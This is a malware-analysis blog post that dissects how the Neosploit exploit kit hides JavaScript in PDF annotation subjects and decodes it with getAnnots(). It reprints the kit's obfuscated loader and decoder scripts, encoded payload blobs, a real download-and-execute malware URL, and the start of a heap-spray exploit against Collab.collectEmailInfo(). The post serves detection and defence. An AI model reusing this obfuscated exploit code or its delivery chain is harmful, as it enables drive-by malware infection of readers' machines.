PDF Obfuscation using getAnnots()

Since around October 2009, Neosploit¹, a black-market exploit toolkit, has been fabricating PDF files in a slightly new way, but in a way which is difficult for many parsers to analyze for maliciousness. In summary, all of the metadata in a PDF is accessible from the Acrobat Javascript environment. And this metadata is being used for obscuring embedded Javascript code. A PDF parser would need to fill in all the document objects with the correct data, and evaluate the Javascript to find the exploit. (Needless to say, many PDF signature parsers don't do this.) These malicious PDFs ultimately install Mebroot (aka: Sinowal)².

[And, oh yeah, our product detects this.]

Breaking News

Update: There's another exploit toolkit doing similar metadata tricks to obscure a CVE-2009-4324 attack. (That's the most recent 0-day.)

I'm going to use this for most of my examples (warning: live as of this writing):

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php

The Wepawet Analysis

The Virus Total Analysis on the downloaded EXE (56a6e96863f6dc0c5c5c64fca6bd3c52)

A Brief Word about Neosploit¹

Like some other toolkits, you can only hit the first exploit page once per source IP. It returns a 404 if you try to fetch it again. The Javascript is broken up into multiple chunks, fetched by the first chunk, deobfuscated, reassembled, and executed. The URI is slightly polymorphic. For example, all of these are really the same program on the server:

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.exe

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py

google.com.analytics.eicyxtaecun.com/nte/TREST11 .asp

google.com.analytics.eicyxtaecun.com/nte/TREST11.exe

google.com.analytics.eicyxtaecun.com/nte/TREST11.html

google.com.analytics.eicyxtaecun.com/nte/TREST11.php

google.com.analytics.eicyxtaecun.com/nte/TREST11.py

[etc.]

Any file starting with "j" appears to be Javascript, "e" appears to be EXEs, and "o" are the polymorphically generated exploit PDFs. Observe:

eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL)

jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948: ASCII text, with very long lines

oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317: PDF document, version 1.3

The filename is composed of several fields of hexadecimal value, with separators which are not in the set [0-9a-f] (case sensitive, "F" is a valid separator). From the above example:

j H999a4551 V0100f070006 R00000000102 Td2dcca7b 2 01 L656e2d75730000000000 K91a68948

e H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948320

o H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948317

The "2 01" is the browser version, "L656e2d75730000000000" means "en-us" I haven't bothered to figure out the rest yet.

This is the first chunk of Javascript that hits your browser. If you started from, say http://dgvlvhhytlta.com/nte/GNH4.exe it would fetch the next chunk (the variable pums ) from http://dgvlvhhytlta.com/nte/GNH4.exe/jH999a4551V0100f070006&hellip. These stages are not on the Wepawet analysis I mentioned above, so I'm including them here for completeness.

<html>


<head>

<script>

function nerot(o6v28_IX_KM, D5___o){var O_Pp6_l = arguments.callee;O_Pp6_l = O_Pp6_l.toString();var X6q8_bl = 0;var U_a8___ej = "a" + "f";var Ghc62j5r1Wr8P = document.getElementById(U_a8___ej);if (Ghc62j5r1Wr8P) {if (!D5___o) {D5___o = Ghc62j5r1Wr8P.value;}}X6q8_bl++;X6q8_bl++;var firot = new Array();if (o6v28_IX_KM) { firot = o6v28_IX_KM;} else {var tk_048_6R_6CyPe = 0;var ScS1Bncy_d_8 = 0;var G_2__3A_r = 512;var gw55F_B__BBV2 = 49;gw55F_B__BBV2--;while(ScS1Bncy_d_8 < O_Pp6_l.length) {var G_sv_c7x6qjTn = 1;var m8d_GS__whx = O_Pp6_l.charCodeAt(ScS1Bncy_d_8);if (m8d_GS__whx >= gw55F_B__BBV2 && m8d_GS__whx <= (gw55F_B__BBV2 + 9)) {if (tk_048_6R_6CyPe == 4) { tk_048_6R_6CyPe = 0; }if (isNaN(firot[tk_048_6R_6CyPe])) { firot[tk_048_6R_6CyPe] = 0; }firot[tk_048_6R_6CyPe] += m8d_GS__whx;if (firot[tk_048_6R_6CyPe] > G_2__3A_r) {firot[tk_048_6R_6CyPe] -= G_2__3A_r;}tk_048_6R_6CyPe++;}ScS1Bncy_d_8++;}}tk_048_6R_6CyPe = 4;while (tk_048_6R_6CyPe > 0) {if (firot[tk_048_6R_6CyPe - 1] > 256) {firot[tk_048_6R_6CyPe - 1] -= 256;}tk_048_6R_6CyPe--;}var QmyQ7eL0R = 0;var x1Kf_448jleM42 = "";var sp__yv_2g_K04cp = 0;var j_G1g_1 = 0;var T__D6_r = 0;var y_6A__C_u;var pdbpQb = 0;while(j_G1g_1 < D5___o.length) {var T_B203hvS__Wvt = D5___o.substr(j_G1g_1, 1) + "J";var Pbukfx_2f7D__1w = parseInt(T_B203hvS__Wvt, 16);if (T__D6_r) {y_6A__C_u += Pbukfx_2f7D__1w;if (QmyQ7eL0R == 4) {QmyQ7eL0R -= 4;}var iJ_d_Qth = y_6A__C_u;iJ_d_Qth = iJ_d_Qth - (pdbpQb + 2) * firot[QmyQ7eL0R];if (iJ_d_Qth < 0) {var xgY5uT7__QoL = Math.floor(iJ_d_Qth / 256);iJ_d_Qth = iJ_d_Qth - xgY5uT7__QoL * 256;}iJ_d_Qth = String.fromCharCode(iJ_d_Qth);if (X6q8_bl == 1) {x1Kf_448jleM42 += Pbukfx_2f7D__1w;} else if (X6q8_bl == 2) {x1Kf_448jleM42 += iJ_d_Qth;} else {x1Kf_448jleM42 += j_G1g_1;}QmyQ7eL0R++;pdbpQb++;T__D6_r = 0;} else {y_6A__C_u = Pbukfx_2f7D__1w * 16;T__D6_r = 1;}j_G1g_1++;};;eval(x1Kf_448jleM42);return 0;}

</script>

</head>

<body onload="nerot() ;"

<input type="hidden" id="aa" value="1">

<input type="hidden" id="af" value="F2D096B1BB5AA764CBE6B0E3B18 [&hellip] 745A6F">

<input type="hidden" id="ab" value="1">

</body>

</html>

And the second chunk:

var pums = 'C8763EB09A160F5F0AC4CEB76';

Find The Pattern

Here's some names of generated PDFs, I've broken the names up into, what I believe are, separate fields. See if you can find the pattern. None of these is obviously an IP address. (I checked for that.)

AVORP1TREST11.exe/o U2773a43b H918373c0 V03007f35002 R8d56bfa1108 Tdac6495d Q000002fc900801 F0020000a J11000601l0409 Kfa01dcdb317: PDF document, version 1.3

AVORP1TREST11.php/o Hf7b12f26 V0100f060006Rf53e765c102 Tbcf2d195204 l0409 K98c2615b317: PDF document, version 1.3

AVORP1TREST11.py/o H999a4551 V0100f070006R00000000102 Td2dcca7d201 l0409 K91a68948317: PDF document, version 1.3

AVORP1TREST11.py/o H9efd3f2d V03006f35002Rf53e765c102 Td5b83f0c Q000002fa901801 F0020000a J11000601 l0409 K5b7f0e41317: PDF document, version 1.3

TREST11 .asp/o H47834891 V0100f060006 R89a36f9c102 T0cc787be203l0409 K07105315317: PDF document, version 1.3

TREST11 .asp/o H91b0de2f V0100f070006 R8f56bc05102 Tdaf42f62201l0404 K544d4bfe317: PDF document, version 1.3

TREST11 .asp/o Ha98d29bd V0100f060006 R89a36f9c102 Te2cb340e204l0409 K4b290413317: PDF document, version 1.3

TREST11 .asp/o He22f9c5c V03007f35002 R8d56bfa1102 Ta96aa0ae Q000002fc901801 F000c000a J10000601 l0409 Kc5ceb2bf317: PDF document, version 1.3

TREST11 .asp/o Hf7ba1c39 V03005f35002 Rf53e765c102 Tbcff3946 Q000002fd901801 F0020000a J11000601 l0409 K4e3afa12317: PDF document, version 1.3

TREST11.exe/o H30847807 V0100f060006 R89a36f9c102 T7bc0ed53203l0409 K7b4d501b317: PDF document, version 1.3

TREST11.exe/o H3ebec388 V03007f35002 Rf53e765c102 T75fbc09a Q000002fc901801 F002a000a J11000601 l0409 Kaa9ea783317: PDF document, version 1.3

TREST11.exe/o H82fea487 V0100f080006 Rf53e765c102 Tc9bb26de201l0409 Kfee4acbe317: PDF document, version 1.3

TREST11.html/o H8b9e4040 V03007f35002 Rf53e765c102 Tc0db4487 Q000002fd901801 F002a000a J11000601 l0409 K575b6c55317: PDF document, version 1.3

TREST11.html/o H9ee97623 V03006f35002 Rf53e765c108 Td5ad4a05 Q000002fd900801 F0020000a J11000601 l0409 K539b6710317: PDF document, version 1.3

TREST11.html/o Ha98d29bd V0100f060006 Rf53e765c102 Te2cb34e5204 l0409K35e5f3e5317: PDF document, version 1.3

TREST11.html/o Hd6a7ae5c V0100f080006 Rf53e765c102 T9de446b5201 l0409Kab6a7970317: PDF document, version 1.3

TREST11.php/o H47834891 V0100f060006 Rf53e765c102 T0cc6cd94203 l0409K6c8c5ba1317: PDF document, version 1.3

TREST11.php/o Hdfab3f7e V0100f080006 R8d56bfa110a T94ee748e201 l0409K678f4226317: PDF document, version 1.3

TREST11.php/o Hff15790b V03006f35002 Rf53e765c10a Tb4506ce8 Q000002fc901801 F002a000a J00000000 l0409 Kadd89d89317: PDF document, version 1.3

TREST11.py/o H28d77e41 V0100f060006 R7bd67009102 T63951338203 l0409 K3c732e33317: PDF document, version 1.3

TREST11.py/o H9ef9bb5c V03007f35002 Rf53e765c102 Td5bdef71 Q000002fc901801 F0020000a J11000601 l0409 Kd3978d8b317: PDF document, version 1.3

TREST11.py/o Hde8a192b V0100f060006 R8f56bc05102 T95cf8f5f203 l0409 K6f2c23ff317: PDF document, version 1.3

TREST11.py/o He5441011 V0100f070006 R89a36f9c102 Tae012b23201 l0804 Ka373855f317: PDF document, version 1.3

TREST11.py/o Hf9287a3c V03006f35002 Rf53e765c10a Tb26c5103 Q000002fc900801 F0020000a J00000000 l0409 Kf8aab2d0317: PDF document, version 1.3

TREST11.py/o Hfb50394b V03007f35002 Rf53e765c102 Tb0152511 Q00000000901801 F002a000a J11000601 l0409 K77546b04317: PDF document, version 1.3

chrisbecfiis.com/nte/AVORP1TREST1.py/eH999a4551V0100f070006R00000000102Td2b6e14c201l0409K816c9c70320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

I guess that's more than a brief word.

How To Speak PDF

 

The PDF itself is rather clean and easy to read³, so I'll step you through it here.

First4, Acrobat checks if the first line is %PDF-1.something, and the last line is %%EOF. The second and third lines from the end are the offset (in bytes) to the cross reference table — the list of objects in the file — and the word startxref. Somewhere near all that, is the trailer dictionary, which says there are nine objects in this file.

The Cross Reference table [xref] is consulted, it says there are nine objects in this table, and that…

Object #1 starts at byte offset 17. (0x11)

Object #2 starts at offset 93. (0x5D), etc…

It's possible to have multiple xref tables by design, so that PDF files can be incrementally updated. [The purpose of this is so that a PDF reader can find each object quickly, without needing to scan the entire file first to locate it, and without needing to rewrite the entire file just to edit something.]

xref

0 9This table references objects 0 through 9

0000000000 65535 fA "Free" (Deleted) Object; Generation 65535 means never reuse this number

0000000017 00000 nObject 1 starts at offset 17 bytes

0000000093 00000 nObject 2 starts at offset 93 bytes

0000000134 00000 nObject 3 starts at offset 134 bytes

            Generation number goes up by one for any object number freed and reused.
[etc.]

0000000411 00000 nObject 7 starts at offset 411 bytes

0000000641 00000 nObject 8 (9th counting from 0)

trailer<</Size 9/Root 1 0 R>> ← Nine objects, Object 1 is the top of the document object tree (The /Catalog object).

startxref

9323 ← Offset to xref above

%EOF

Offset Examples

00000000  25 50 44 46 2d 31 2e 33  0d 0a 25 b1 b3 f3 ce 0d  |%PDF-1.3..%.....|

00000010 0a 31 20 30 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f |.1 0 obj<</Type/|

Byte 17 (0x11) is a "1"

[…]

00000040 20 52 2f 4f 70 65 6e 41 63 74 69 6f 6e 20 36 20 | R/OpenAction 6 |

00000050 30 20 52 3e 3e 65 6e 64 6f 62 6a 0d 0a 32 20 30 |0 R>>endobj..2 0|

Byte 93 (0x5D) is a "2"

00000060 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f 4f 75 74 6c | obj<</Type/Outl|

[…]

00002450 ff 03 a2 65 8b 77 0d 0a 65 6e 64 73 74 72 65 61 |...e.w..endstrea|

00002460 6d 0d 0a 65 6e 64 6f 62 6a 0d 0a 78 72 65 66 0d |m..endobj..xref.|

Byte 9323. (0x246B) is a "xref"

00002470 0a 30 20 39 0d 0a 30 30 30 30 30 30 30 30 30 30 |.0 9..0000000000|

The comment near the beginning of the file, the four bytes with their high bits set, is a way to warn most systems where there is a distinction between 'text' and 'binary' modes for files, that this file is going to be 'binary'.

Brief Syntax Guide

 

  • Anything between % and end-of-line is a comment.
  • Anything between ()'s is a literal string.
  • Anything starting with a / is a Name.
  • Anything inside of []'s is an array.
  • Anything inside of stream endstream is data stream (think of it as a very large string constant or blob).
  • Anything inside of <<>> is a dictionary (name-value pairs, like this:

    <</Type /foo /Thingy 123456>>)

  • Indirect objects are defined like Object_Number Version obj Stuff endobj. For example: 123 45 obj(I'm a literal string)endobj.
  • An indirect can be used — Referenced — from anywhere else that a normal object (string, integer, etc.) would go, by simply writing the object number and version number followed by an R. For example: 123 45 R substitutes for that literal string in the example above.
  • Every useful dictionary object has an entry for what /Type it is. For example, the /Catalog type is used for the document tree root, and /Font is used for font objects.

That Neosploit PDF

Object #1 (The Catalog object) says that…

Object #2 is the top of the Outline tree (that side panel in your PDF viewer)…

Object #3 is the top of the Page tree…

And to perform the action in Object #6 when the document is opened.

Object #2 says there really isn't an outline for this document.

Object #3 says there is one page in the tree, which is Object #4 .

Object #6 says to execute the Javascript in Object #7.

Object #4 is the descendant of Object #3. It says the page size is 612x792 points (or 8.5x11 inches), and that it contains an Annotation, with the annotation details in Object #5…

Object #5 says that Object #8 is the Subject of this Annotation (The sekret Javascript exploit code).

These are the good parts:

Object #7 is the Javascript that's executed upon document open. It's a decoder for the Javascript hidden in…

Object #8 The Annotation Subject string, a large blob of encoded Javascript.

In PDF-Speak

%PDF-1.3

%Four bytes between 0x80 and 0xFF

1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj

2 0 obj<</Type/Outlines/Count 0>>endobj

3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj

4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj

5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj

6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj

7 0 obj<</Length 158/Filter/FlateDecode>>

stream

The zlib compressed data goes here

endstream

endobj

8 0 obj<</Length 8609/Filter/FlateDecode>>

stream

The other zlib compressed data goes here

endstream

endobj

xref

0 9

0000000000 65535 f

0000000017 00000 n

0000000093 00000 n

0000000134 00000 n

0000000184 00000 n

0000000266 00000 n

0000000358 00000 n

0000000411 00000 n

0000000641 00000 n

trailer<</Size 9/Root 1 0 R>>

startxref

9323

%EOF

Analysis

The /FlateDecode streams are compressed with the deflate algorithm, the exact same one used in PKZip, gzip, and PNG.

If you're trapped on a desert island, with only primitive Unix tools. You can just slap a gzip header onto the beginning of the zlib compressed blob, and use gunzip to decompress it. (Don't forget to add four bytes to the end for the length.)

$ echo -ne "\x1f\x8b\x08\x00BLAH" > example.gz

$ cat stream7 >> example.gz $ echo -ne "\x00\x00\x00\x00" >> example.gz $ zcat example.gz |less zcat: example.gz: invalid compressed data--crc error zcat: example.gz: invalid compressed data--length error var z; var y; z = y = app.doc;

y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

Hey look! It's Javascript!

This trick only works as long as bit 5 of the second byte of the zlib stream is not set. (Which I've not seen in a PDF stream yet.) I'd explain why this works, but this blog post is too long already. Compare RFC1950 Section 2.2 vs. RFC1952 Section 2.3 if you really want to know. You can also decompress the stream with a pencil and paper too if you don't have a computer. It's not that difficult, just remember that the bits in each octet are reversed from how they look in rfc1951 (Why are y'all looking at me like that? I had to fix a corrupt zip file…)

Otherwise use xpdf or Didier Stevens' tool(s) like a normal person.

pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 7

pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 8 python pdf-parser.py -f oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317

Back to the PDF

This is the uncompressed stream from Object #7

Almost every PDF I've examind so far has this exact same code in Object #7. (There's apparently a newer version of the toolkit which is doing a little bit of obfuscation to this block.)

var z; var y; z = y = app.doc;

 

y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

[This getAnnots() usage is completely unrelated to CVE-2009-1492]

The uncompressed stream from Object #8; The subject of this annotation, and second stage of Javascript, is:

z0dz0az0dz0az09z66z75z6ez63z74z69z […]

The z characters are replaced by %, and then the whole thing unescape()'d. I've seen other variants use y, g, or h, and a little more obfuscation of the code above.

More obfuscation from a different Neosploit toolkit

For Example:

var z+-; ar y;

var h = 'edvoazcl';

z = y = app[h.replace(/[aviezjl]/g, '')];

var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s);

s = ''; z = 1;

The 'y' characters are replced by '%', and then the whole thing unescaped.

s.replace(/[zhyg]/g, '%')

y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33y56y64y4ay56y62y30y49y64y28y76y5fy5fy4dy61y78y6ay2cy20y70y30y5fy59y32y54y29y7by76y61y72y20y73y5fy5fy5fy51y33y35y68y [...]

About syncAnnotScan and getAnnots

12.5.6.4         Text Annotations

A text annotation represents a “sticky note” attached to a point in the PDF document. When closed, the annotation shall appear as an icon; when open, it shall display a pop-up window containing the text of the note in a font and size chosen by the conforming reader. Text annotations shall not scale and rotate with the page; they shall behave as if the NoZoom and NoRotate annotation flags (see Table 165) were always set. Table 172 shows the annotation dictionary entries specific to this type of annotation.
— From the PDF 1.7 Reference ISO 32000-1:2008.

So let's take a look at that annotation object again:

5 0 obj <<

   /Type/Annot

   /Subtype /Text ← This is a Text Annotation

   /Name /Comment ← Default to a Comment-Style Icon for display

   /Rect[25 100 60 115] ← Location of the annotation on page.

   /Subj 8 0 R ← Subject is that object full of encoded Javascript

>>endobj

 

/Subj
Text representing a short description of the subject being addressed by the annotation. ISO 32000-1

The getAnnots() function returns an array of annotation objects, and accepts an associative array with the following possible labels [ibid.]:

 

nPage
A 0-based page number. If not set, all pages that match filter.

 

nSortBy
A sort method applied to the array. (by Page, Author, Moddate, etc.)

 

bReverse
If true, causes the array to be reverse sorted with respect to nSortBy.

 

nFilterBy
Gets only annotations satisfying certain criteria. (Printable, viewable, editable, etc.)

Contrast this with getAnnot() which returns a single Annot object by name.

Example

// From the Acrobat JavaScript Scripting Reference

// All annotations on the first page, in reverse order by author.

var annots = this.getAnnots({

nPage:0,

nSortBy: ANSB_Author,

bReverse: true

});

Cleaned Up Code With Commentary

var z;

var y;

z = y = app.doc;

y = 0;

z.syncAnnotScan ( ); // Acrobat scans for annotations in the

// document, as a background task.

// This function blocks until all of the

// annotations in the document have been found.

y = z;

var p = y.getAnnots( { nPage: 0 }) ; // This is the new technique.

// getAnnots() returns a list of annotation

// objects. (For the first page in this case)

var s = p[0].subject; // Get the subject from the first annotation

// object.

var l = s.replace(/z/g, '%'); // The 'z' characters are replaced by '%'

s = unescape (l) ; // and then the whole thing unescape()'d

eval(s); // Run the second stage Javascript

s = '';

z = 1;

The Next Part

The third layer of this Javascript onion will decode the next part

differently, depending on whether or not the app object is defined. (It is defined inside of Acrobat Reader, but not within most any other ECMAScript/Javascript engines.) If your parser doesn't get a "2" out of this:

 

try {

if (app) {

magic_value = 2;

}

} catch(e) {

}

Then it's going to eval() gibberish. If decoded correctly it does a heap spray, and exploits Collab.collectEmailInfo() The shellcode does HTTP download and execute from:

http://google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320

… What Virustotal says about it: 56a6e96863f6dc0c5c5c64fca6bd3c52 (It's Mebroot).

 

       function X6__4k3VdJVb0Id(v__Maxj, p0_Y2T){var s___Q35hFa = arguments.callee;var a4__LfE__5a6 = 0;var Do_

YD6N_7p40_r = 512;s___Q35hFa = s___Q35hFa.toString();try {if (app) {a4__LfE__5a6 = 3;a4__LfE__5a6--;}} catch(e)

{ }var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;} else {var s4_AeGcS_Ru807 = 0;var OKD

_8Y_tjg = 0;var a_i_qruF1_u = 49;a_i_qruF1_u--;while(OKD_8Y_tjg < s___Q35hFa.length) {var hYE0g_2_q = 1;var rTb_

w_VCb55 = s___Q35hFa.charCodeAt(OKD_8Y_tjg);if (rTb_w_VCb55 >= a_i_qruF1_u && rTb_w_VCb55 <= (a_i_qruF1_u + 9))

{if (s4_AeGcS_Ru807 == 4) { s4_AeGcS_Ru807 = 0; }if (isNaN(M8I2Nb0IWaPT7[s4_AeGcS_Ru807])) { M8I2Nb0IWaPT7[s4_Ae

GcS_Ru807] = 0; }M8I2Nb0IWaPT7[s4_AeGcS_Ru807] += rTb_w_VCb55;if (M8I2Nb0IWaPT7[s4_AeGcS_Ru807] > Do_YD6N_7p40_r

) {M8I2Nb0IWaPT7[s4_AeGcS_Ru807] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807++;}OKD_8Y_tjg++;}}s4_AeGcS_Ru807 = 4;Do_YD6N

7p40_r = 256;while (s4_AeGcS_Ru807 > 0) {var OKD_8Y_tjg = s4_AeGcS_Ru807 - 1;if (M8I2Nb0IWaPT7[OKD_8Y_tjg] > Do_

YD6N_7p40_r) {M8I2Nb0IWaPT7[OKD_8Y_tjg] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807--;}var F_kH_v = 0;var eG76_l = "";var

JtRA2__j_Ae = 0;var GbFYrkx_PbnQ6f6 = 0;var J8_i60lnd = 0;var ltqGwaY;var I1_EB__2_wf = 0;while(GbFYrkx_PbnQ6f6

< p0_Y2T.length) {var c_Y4Ti = p0_Y2T.substr(GbFYrkx_PbnQ6f6, 1) + "J";var A_8_QHs1s = parseInt(c_Y4Ti, 16);if (

J8_i60lnd) {ltqGwaY += A_8_QHs1s;if (F_kH_v == 4) {F_kH_v -= 4;}var uYND0Nm = ltqGwaY;uYND0Nm = uYND0Nm - (I1_EB

__2_wf + 2) * M8I2Nb0IWaPT7[F_kH_v];if (uYND0Nm < 0) {var OF0F_A6__nLc = Math.floor(uYND0Nm / 256);uYND0Nm = uYN

D0Nm - OF0F_A6__nLc * 256;}uYND0Nm = String.fromCharCode(uYND0Nm);if (a4__LfE__5a6 == 1) {eG76_l += A_8_QHs1s;}

else if (a4__LfE__5a6 == 2) {eG76_l += uYND0Nm;} else {eG76_l += GbFYrkx_PbnQ6f6;}F_kH_v++;I1_EB__2_wf++;J8_i60l

nd = 0;} else {ltqGwaY = A_8_QHs1s * 16;J8_i60lnd = 1;}GbFYrkx_PbnQ6f6++;}eval(eG76_l);return 0;}

X6__4k3VdJVb0Id(0, "10E5E67437933DC36719A1A5A4B40DA4D8A9BBB4DF662A054BCC55EF7CB512E4914F603DD828A821C29

376A3786906F5F3D1C7FB1B98C73DC440954C8F67BAA4FF217C877A39684B01CFBE5C8F36FE309A3E5DD3D532ACC81E69E13B6A05123AA30

741E0DF8121A15D9705C7546E167C3324D8FF4D50A44245B7A9E4533E67484B643C17F54A584CC4320BEECC7C5B852A3F6C5816DA6D2C613

FF28F8BD8E2BE22DCF4A4F26284F81BBAC4CBA451041AAE6864F24E34A4C6885BE54890631A3C1D9A58CAE71C894FD047FA667F3F7D99B7C

[…]B9647DC9");

Howto Deobfuscate

Ya'know, if you wanted to…

The obfuscation in this case is just a search and replace with random variable names, so just search and replace them back to something meaningful.

  • Replace ";" with ";\n" and "}\n" to prettyprint.
  • When you see var M8I2Nb0IWaPT7 = new Array(); you can rename M8I2Nb0IWaPT7 to something more meaningful like "array1".
  • When you see eval(eG76_l); you can rename eG76_l to something like evaluated_string.
  • When you see for(var 6R_6CyPe=0;6R_6CyPe<0x_17x5;6R_6CyPe+=2){ you can say, oh hey, 6R_6CyPe is an index, and 0x_17x5 is the loop count
  • charCodeAt(index) returns a byte
  • p0_Y2T.substr and s___Q35hFa.length are strings, so rename apropriately
  • function X6__4k3VdJVb0Id( is a function, so rename apropriately
  • while(OKD_8Y_tjg < s___Q35hFa.length){ OKD_8Y_tjg++; well it's a good guess that OKD_8Y_tjg is a loop index.
  • Use common sense to make the Javascript ledgible to humans. (None of this matters if you're a machine.)

The Javascript, gets a copy of itself (the blob of code being eval()'d) using arguments.callee; which is hashes into a four byte key. I just added a…

var callee = unescape('%66%75%6e%63%74%69%6f%6e%20%58%36%5f [...] %6e%20%30%3b%7d');
of the original obfuscated code (just up to the %09 (TAB) character), and repaced arguments.callee.toString() with callee.

function decode(arg1, arg2_hex){

//var argarg = arguments.callee; var argarg = callee; // that unescape() I mentioned //var threethings = 0; // Original

var threethings = 2; // Who cares that app is missing?

var fivetwelve = 512;

argarg = argarg.toString();

try {

if (app) {

threethings = 3;

threethings--; // So you mean 2 then

}

} catch(e) {

}

var array1 = new Array();

if (arg1) {

array1 = arg1;

} else {

var fourthings = 0;

var index = 0;

var fourtynine = 49;

fourtynine--; // ok 48 then (it's for ASCII "0")

while(index < argarg.length) {

var hYE0g_2_q = 1; // unused

var input_byte = argarg.charCodeAt(index);

// In set of [0-9]

if (input_byte >= fourtynine && input_byte <= (fourtynine + 9)) {

if (fourthings == 4) {

fourthings = 0;

}

if (isNaN(array1[fourthings])) {

array1[fourthings] = 0;

}

array1[fourthings] += input_byte;

// keep total from getting too big

if (array1[fourthings] > fivetwelve) {

array1[fourthings] -= fivetwelve;

}

fourthings++;

} // if

index++;

} // while

} // if

print(array1); // 154,315,117,92

fourthings = 4;

fivetwelve = 256;

while (fourthings > 0) {

var index = fourthings - 1;

// keep to a byte

if (array1[index] > fivetwelve) { //256

array1[index] -= fivetwelve; //256

}

fourthings--;

} // while

var indexmod4 = 0;

var evaluated = "";

var JtRA2__j_Ae = 0; // unused

var index2 = 0;

var flag = 0;

var accumulator;

var index3 = 0;

while(index2 < arg2_hex.length) {

// var c_Y4Ti = arg2_hex.substr(index2, 1) + "J";

var c_Y4Ti = arg2_hex.substr(index2, 1) ;

var parsedint = parseInt(c_Y4Ti, 16);

if (flag) {

accumulator += parsedint;

if (indexmod4 == 4) {

indexmod4 -= 4;

}

var lotsomath = accumulator;

lotsomath = lotsomath - (index3 + 2) * array1[indexmod4];

if (lotsomath < 0) {

var mod256 = Math.floor(lotsomath / 256);

lotsomath = lotsomath - mod256 * 256;

}

if (threethings == 1) {

evaluated += parsedint; // This should never run

} else if (threethings == 2) {

evaluated += lotsomath; // This is the only line that actually decrypts

} else {

evaluated += index2; // This should never run

}

indexmod4++;

index3++;

flag = 0;

} else {

accumulator = parsedint * 16;

flag = 1;

} // while

index2++;

} // while

eval(evaluated);

return 0;

}

The Next Part After That

And finally, we've made it to the crunchy center of this metaphor. This does the heap spray, and exploits Collab.collectEmailInfo(). Nothing really new here.

ar I8tR_yfW_B_G_4 = new Array();var co3L10RH0e_sDj = 0;var k_IbUu = "";function w4U_ES(QnE1DcNMb, c_i4I__W){var LHE7_u = c_i4I__W.toString();var b1oTk__25tEY4 = "";for(var S8_T83_ajR = 0; S8_T83_ajR < LHE7_u.length; S8_T83_ajR++) {var ksHn4MF6Hh4cHia = parseInt(LHE7_u.substr(S8_T83_ajR, 1));if (!isNaN(ksHn4MF6Hh4cHia)) {ksHn4MF6Hh4cHia = ksHn4MF6Hh4cHia.toString(16);if (ksHn4MF6Hh4cHia.length == 1) { ksHn4MF6Hh4cHia = "0" + ksHn4MF6Hh4cHia; }else if (ksHn4MF6Hh4cHia.length != 2) { ksHn4MF6Hh4cHia = "00"; }b1oTk__25tEY4 = ksHn4MF6Hh4cHia + b1oTk__25tEY4;}}while(b1oTk__25tEY4.length < 8) { b1oTk__25tEY4 = "0" + b1oTk__25tEY4; }var k__7_H1 = QnE1DcNMb.toString(16);if (k__7_H1.length == 1) { k__7_H1 = "0" + k__7_H1; }else if (k__7_H1.length != 2) { k__7_H1 = "00"; }b1oTk__25tEY4 = "3" + k__7_H1 + "P" + b1oTk__25tEY4;return b1oTk__25tEY4;}function Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA){var A_p_p7p2__u2x = new Array("");var nd__8__O_E6 = H_O610_85G;var O86U_8;if ((O86U_8 = H_O610_85G.lastIndexOf("%u00")) != -1) {if (O86U_8 + 6 == H_O610_85G.length) {A_p_p7p2__u2x[0] = H_O610_85G.substr(O86U_8 + 4, 2);nd__8__O_E6 = H_O610_85G.substring(0, O86U_8);}}O86U_8 = 1;for (S8_T83_ajR = 0; S8_T83_ajR < G_Rp3BOccXCA.length; S8_T83_ajR++) {var aD3K_EP_v_WML61 = G_Rp3BOccXCA.charCodeAt(S8_T83_ajR).toString(16);if (aD3K_EP_v_WML61.length == 1) { aD3K_EP_v_WML61 = "0" + aD3K_EP_v_WML61; }A_p_p7p2__u2x[O86U_8] = 